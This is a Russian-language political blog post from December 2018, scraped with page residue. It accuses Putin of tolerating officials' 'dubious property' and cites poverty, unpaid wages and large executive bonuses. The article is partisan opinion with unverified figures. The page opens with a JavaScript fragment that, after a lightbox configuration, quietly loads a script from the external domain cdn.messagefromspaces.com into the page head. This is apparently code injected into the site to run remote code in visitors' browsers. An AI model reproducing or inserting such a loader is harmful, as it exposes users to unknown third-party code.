, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Какое самое трудное решение Путин не решается принять?

21 Дек

Прошедшая  пресс-конференция главы государства показала, что Путин с готовностью отвечал на все вопросы журналистов, объясняя свою позицию.

Например, несмотря на то, что  по данным «Левада-центра» 66 процентов с ностальгией отзываются о Советском Союзе, решение возродить в стране социализм, Путин не примет.

Он полагает, что социализации экономики, социальной сферы,  всегда связано с расходами больше доходов, и, в конечном итоге, с тупиком в экономике.

Путин утверждает http://kremlin.ru/events/president/news/59455 , что  выстраивает политику, направленную на снижение до минимума количество людей, которые живут за  чертой бедности, обеспечение подавляющего большинства  людей услугами здравоохранения, образования на приемлемых условиях. Именно  на это и направлены национальные проекты. Этим обеспечивается справедливое распределение ресурсов, справедливое отношение к людям.

Но, анализ  «выстраиваемой политики» даёт основания полагать, что миллионы россиян, живущие за чертой бедности, так и не доживут до жизни достойной человека, который должен быть высшей ценностью в России.

Если в столице страны работникам хлебокомбината «Черкизово», приходится добиваться выплаты зарплат протестами, коллективными  обращениями в Администрацию Президента России и  объявлениями голодовки https://iz.ru/825427/2018−12−19/ustroivshim-protest-rabotnikam-khlebokombinata-cherkizovo-stali-platit-zarplatu?utm_source=yxnews&utm_medium=desktop   , то,  что происходит на предприятиях страны, приходится только догадываться.

Тем более, что каждый четвертый работодатель начнет 2019 год с увольнений https://rg.ru/2018/12/19/kazhdyj-chetvertyj-rabotodatel-nachnet-2019-god-s-uvolnenij.html?utm_source=yxnews&utm_medium=desktop

При этом, сложившееся «распределение ресурсов» нельзя назвать справедливым.

Сумма премий по компаниям:

«Роснефть» — 2 млрд 776 млн рублей на 11 человек;

«Газпром» — 3 млрд 268 млн рублей на 16 человек;

«Сбербанк» — 5 млрд 108 млн рублей на 9 человек.

Вот она, справедливость.

Наши ТОП-менеджеры «Сбербанка», «Газпрома» и «Роснефти» выписали себе премий на сумму 11 млрд и 152 млн рублей на 36 человек.

Это больше, чем заработали 6 регионов России https://www.yaplakal.com/forum7/topic1883834.html?utm_referrer=https%3A%2F%2Fzen.yandex.com

На эти средства можно в разы увеличить пенсий 2,638 млн военных пенсионеров. Либо 15 млн. человек вывести за черту бедности.

Да, они эти средства не украли, но они и не стали бюджетными средствами, позволяющими до минимума снизить количество людей, которые живут за  чертой бедности.

Но, пожалуй, самым трудным решением, которое Путин не решается принять, является ограничение использования «сомнительной собственности»  чиновников. По экспертным оценкам такой собственности у чиновников скопилось на десятки триллионов рублей. Фактически ещё один бюджет страны, но используемый ограниченным кругом чиновников.

Сам факт наличия такой собственности ставит крест на всех достижениях, что имел Путин за 18 лет руководства страной.

Источником «сомнительной собственности» чиновников являются именно бюджетные средства, как всенародное достояние.

Миллионы государственных чиновников обязаны охранять и оберегать бюджет, но который год СМИ нам рассказывают о распилах и откатах бюджетных средств, где соучаствуют различные чиновники.

Но реальную картину неправомерного обогащения чиновников россияне наблюдают в каждом регионе, видя дома-дворцы, дачи-сказки, иностранные авто и барскую жизнь.

Почему они так живут, несмотря на то, что в стране седьмой год действует п.п. 8 п. 2 ст. 235 ГК РФ, позволяющий обращать в доход государства «сомнительную собственность» чиновников?

Ответ прост, при ручном, не правовом управлении страной, что организовал Путин, иначе быть не может.

Применения этой нормы напрямую зависит от Путина и его  администрации, которая и наделена правом сбора материалов по «сомнительной собственности». Эти материалы затем передаются в Генеральную прокуратуру. Нет материалов и Генеральная прокуратура бессильна, несмотря на многочисленные жалобы россиян на живущих явно не по средствам чиновников.

Глава Счётной палата А. Кудрин утверждает https://www.mk.ru/economics/2018/06/20/kudrin-otchitalsya-o-narusheniyakh-na-19-trln-rubley-napominaet-katastrofu.html  : «недостатки в бюджетной сфере выросли до 1,865 трлн рублей, что вдвое выше показателя прошлого года».

А в 2019 году надо ожидать удвоение  уже  показателей 2018 года?

Получается, что взявшиеся осуществлять государственную власть, обеспечили сытую жизнь себе и своим родственникам, создали условия для безнаказанного разворовывания триллионами бюджетные средства, а народу, что, как единственный источник власти в стране, доверил им осуществлять государственную власть, обещают  светлое будущее, как при власти КПСС.

Нет, господа хорошие. Все помнят, да и вы не забыли,  чем завершилось самовластие КПСС. Только в этот раз  вряд ли будут амнистии и помилования для тех, кто так осуществлял государственную власть. Не спасёт и двойное гражданство, и собственность за рубежом. Всех найдут и осудят, возможно, как «врагов народа».

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.